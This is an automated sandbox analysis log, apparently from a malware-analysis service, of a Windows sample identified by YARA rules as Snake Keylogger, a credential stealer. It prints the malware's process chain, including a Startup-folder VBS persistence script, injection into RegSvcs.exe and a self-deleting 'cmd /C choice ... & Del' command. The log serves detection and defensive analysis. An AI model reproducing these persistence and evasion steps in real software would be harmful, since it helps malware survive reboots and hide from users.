Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: String function: 00897DE1 appears 34 times
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: String function: 008B0AE3 appears 70 times
Source: 8kDIr4ZdNj.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@22/15@2/2
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008FA06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E81CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008FB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0090EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008FC397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00894E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | File created: C:\Users\user\AppData\Local\konked
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | File created: C:\Users\user\AppData\Local\Temp\aut1FFC.tmp
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
Source: 8kDIr4ZdNj.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 8kDIr4ZdNj.exe | Virustotal: Detection: 70%
Source: 8kDIr4ZdNj.exe | ReversingLabs: Detection: 65%
Source: EmbeddedExe1.exe | String found in binary or memory: config-serial-stopbits
Source: EmbeddedExe1.exe | String found in binary or memory: config-address-family
Source: EmbeddedExe1.exe | String found in binary or memory: config-ssh-portfwd-address-family
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | File read: C:\Users\user\Desktop\8kDIr4ZdNj.exe
Source: unknown | Process created: C:\Users\user\Desktop\8kDIr4ZdNj.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Process created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: kernel.appcore.dll
